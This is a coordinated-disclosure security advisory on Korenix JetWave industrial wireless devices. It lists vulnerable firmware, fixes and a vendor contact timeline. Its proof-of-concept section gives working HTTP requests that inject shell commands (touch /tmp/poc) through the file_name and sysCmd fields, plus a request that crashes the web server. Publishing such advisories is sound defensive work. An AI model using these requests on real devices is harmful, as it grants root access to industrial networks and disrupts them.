Multiple Vulnerabilities in Korenix JetWave Series

Multiple JetWave products from Korenix are prone to command injection and denial of service (DoS) vulnerabilities.

Vendor description

“Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.
[…] Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, andTransportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners.”

Source:
https://www.korenix.com/en/about/index.aspx?kind=3

Vulnerable versions

The following firmware versions have been found to be vulnerable by CyberDanube:

Korenix JetWave4221 HP-E <= V1.3.0
Korenix JetWave 3220/3420 V3 < V1.7

The following firmware versions have been identified to be vulnerable by the vendor:

Korenix JetWave 2212G V1.3.T
Korenix JetWave 2212X/2112S V1.3.0
Korenix JetWave 2211C < V1.6
Korenix JetWave 2411/2111 < V1.5
Korenix JetWave 2411L/2111L < V1.6
Korenix JetWave 2414/2114 < V1.4
Korenix JetWave 2424 < V1.3
Korenix JetWave 2460 < V1.6

Vulnerability overview

1) Authenticated Command Injection (CVE-2023-23294, CVE-2023-23295)
The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker.

2) Authenticated Denial of Web-Service (CVE-2023-23296)
When logged in, a user can issue a POST request such that the underlying binary exits. The Web-Service becomes unavailable and cannot be accessed until the device gets rebooted.

Proof of Concept

1) Authenticated Command Injection

1.a) – CVE-2023-23294
The command „touch /tmp/poc“ was injected to the system by using the following
POST request:

POST /goform/formTFTPLoadSave HTTP/1.1
Host: 172.16.0.38
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
Origin: http://172.16.0.38
Connection: close
Referer: http://172.16.0.38/mgmtsaveconf.asp
Cookie: -common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45
Upgrade-Insecure-Requests: 1
submit-url=%2Fmgmtsaveconf.asp&ip_address=192.168.1.1&file_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp_action=load&tftp_config=Submit

The command gets executed as root and a file under the folder /tmp/ is created.

1.b) – CVE-2023-23295
The command „touch /tmp/poc2“ was injected to the system by using the following POST request:

POST /goform/formSysCmd HTTP/1.1
Host: 172.16.0.38
Content-Type: application/x-www-form-urlencoded
Connection: close
Referer: 172.16.0.38
Cookie: -common-web-session-=::webs.session::df1307d508d798638a8b4572987462bb
Content-Length: 40
sysCmd=touch%20/tmp/poc2&submit-url=

The command gets executed as root and a file under the folder /tmp/ is created. Command output is written into /tmp/syscmd.

2) Authenticated Denial of Web-Service (CVE-2023-23296)

The process goahead chrashes when the following POST request is sent to the endpoint /goform/formDefault:

POST /goform/formDefault HTTP/1.1
Host: 172.16.0.38
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://172.16.0.38
Connection: close
Referer: http://172.16.0.38/toolping.asp
Cookie: -common-web-session-=::webs.session::3c624961199904f380e978a3967cc356
Upgrade-Insecure-Requests: 1
PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping

The output was observed on the terminal using our emulated instance:

rm: invalid option — /
BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binary
Usage: rm [OPTION]… FILE…
Remove (unlink) the FILE(s). You may use ‚–‚ to
indicate that all following arguments are non-options.
Options:
-i always prompt before removing each destination
-f remove existing destinations, never prompt
-r or -R remove the contents of directories recursively
killall: wlwatchdog: no process killed
killall: wlapwatchdog: no process killed

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Owner of these products are suggested to update to the following versions:

Korenix JetWave 4221 HP-E V1.4.0
Korenix JetWave 2212G V1.10
Korenix JetWave 2212X/2112S V1.11
Korenix JetWave 2211C V1.6
Korenix JetWave 2411/2111 V1.5
Korenix JetWave 2411L/2111L V1.6
Korenix JetWave 2414/2114 V1.4
Korenix JetWave 2424 V1.3
Korenix JetWave 2460 V1.6
Korenix JetWave 3220/3420 V3 V1.7

Workaround

None

Recommendation

CyberDanube recommends customers from Korenix to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.

Contact Timeline

2022-12-05: Contacting Beijer Electronics Group via cs@beijerelectronics.com
2022-12-12: Meeting with Beijer Electronics. Vulnerabilities were confirmed by the vendor. The vendor planned to fix the vulnerabilities in the next 1.5 months.
2023-01-04: Contact shared the updated firmware version. CyberDanube checked if the vulnerabilities got fixed. The contact communicated that
not only JetWave4221 is vulnerable to these issues. Therefore, CyberDanube postponed the release of the Advisory until the other
products have been patched.
2023-01-30: Meeting with Beijer Electronics. Customer get informed about the issues. Fixes got published. Disclosure date got shifted to 2023-02-13 to provide a time-window for patching.
2023-02-13: Coordinated release of security advisory.

Author(s)

Thomas Weber

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the „Austrian Cyber Security Challenge“, where he has won in his category with an impressive number of points.